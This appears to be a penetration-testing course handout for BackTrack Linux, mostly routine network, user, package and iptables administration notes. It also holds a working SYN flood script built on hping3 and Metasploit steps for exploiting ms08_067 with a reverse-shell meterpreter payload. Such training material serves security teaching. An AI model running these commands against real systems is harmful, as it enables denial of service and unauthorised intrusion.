If you wish to follow along with the instructor using 
Linux BackTrack, download BackTrack for free from:

  http://www.backtrack-linux.org/downloads/

Install to a VM or download the VMware image.

Default username is "root", password is "toor".

Run "startx" to load the GUI desktop.




Here are some reminder notes about configuration:

#######################################################
     Change IP Address (Permanent)
#######################################################
man interfaces
gedit /etc/network/interfaces

	auto eth0
	iface eth0 inet dhcp

	auto eth1
	iface eth1 inet static
	address 10.1.1.1
	netmask 255.255.0.0
	gateway 10.1.1.2

ifdown eth0
ifup eth0



#######################################################
     Change IP Address (Temporary)
#######################################################
ifconfig eth0 192.168.1.188 netmask 255.255.255.0 up
route add default gw 192.168.1.1
echo nameserver 192.168.1.3 > /etc/resolv.conf



#######################################################
     Password, User and Group Management
#######################################################
passwd <username>

id [<username>]

adduser <username>
deluser <username>
cat /etc/passwd

addgroup <groupname>
delgroup <groupname>
cat /etc/group



#######################################################
     Daemons
#######################################################
runlevel
telinit <new-run-level>

ls /etc/init.d
ls /etc/rc2.d  (if at runlevel 2)

service --status-all
initctl list
initctl status|start|stop|restart cron

netstat -plunt
ps auxf



#######################################################
     PACKAGE MANAGEMENT
#######################################################
dpkg -l                       # List installed packages.
dpkg -S <path-to-binary>      # Who owns this file?                
apt-cache search <regex>      # Search available pkgs.
apt-get [update | install | remove | check | upgrade] 



#######################################################
     IPTABLES
#######################################################
iptables -L
iptables -A|-D|-F <chain> <options>
<chain> = INPUT | FORWARD | OUTPUT | PREROUTING | POSTROUTING 
<options> =
	-t = table = FILTER (default) | NAT | MANGLE
	-p = protocol = udp | tcp
	-s = source = 0/0 (any)
	-d = destination
	-i = input interface
	-o = output interface
	-j = jump target = DROP | REJECT | ACCEPT | LOG | DNAT | SNAT | MASQUERADE
	-p udp|tcp --dport = destination port
	-p udp|tcp --sport = source port
	-m --state = ESTABLISHED | NEW | RELATED | INVALID


echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo 1 > /proc/sys/net/ipv4/ip_forward



#######################################################
     SYN Flooding
#######################################################

#!/bin/bash
# Copy this text to a new file: synflood.bash
# Usage: synflood.bash 10.1.1.1 80
# Don't forget to: chmod 777 synflood.bash
# and if you copied from Windows: dos2unix synflood.bash

# Because hping replies with resets, the resets must be dropped.

iptables -A OUTPUT -p tcp -d $1 -m tcp --tcp-flags SYN,ACK,FIN,RST RST -j DROP

# Use random source IPs only when target has default route to Internet;
# otherwise, flood using the attacker's source IP when lab testing.

# hping3 --flood --rand-source -S -p $2 $1 
hping3 --flood -S -p $2 $1 

iptables -D OUTPUT -p tcp -d $1 -m tcp --tcp-flags SYN,ACK,FIN,RST RST -j DROP 



#######################################################
     METASPLOIT CONSOLE
#######################################################
msfupdate
msfconsole
search -t exploit/windows/smb            # See 'help search'.
info exploit/windows/smb/                # Use tab completion.
use exploit/windows/smb/ms08_067_netapi  # Use tab completion.
show options                             # After exploit selected.
set rhost 192.168.1.179
info payload/windows/meterpreter/reverse_tcp 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.151
exploit                                  # Should get meterpreter.
help                                     # Show meterpreter help.
background
sessions -l                              # List sessions.
sessions -i 1                            # Interact with session 1.

# Misc
connect [-s] <ipaddr> <port>             # Netcat-like, -s for SSL.
setg <variable> <data> ; save            # Load saved globals next time.

# To install meterpreter with a username and password/hash:
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
show options
set ...

              

#######################################################
     RDP and SMB
#######################################################
tsclient &

smbclient -U <username> -W <domain-or-servername> //server/share
smbclient -U <username> -W <domain-or-servername> //server/share "<passphrase>"
?
ls
!ls
!pwd
get ...
put ...
quit



#######################################################
     SSH
#######################################################
initctl status ssh                  # Is it running?
initctl start ssh                   # Start sshd.
apt-get install ssh                 # If not installed.
ssh root@192.168.1.3
putty.exe root@192.168.1.3




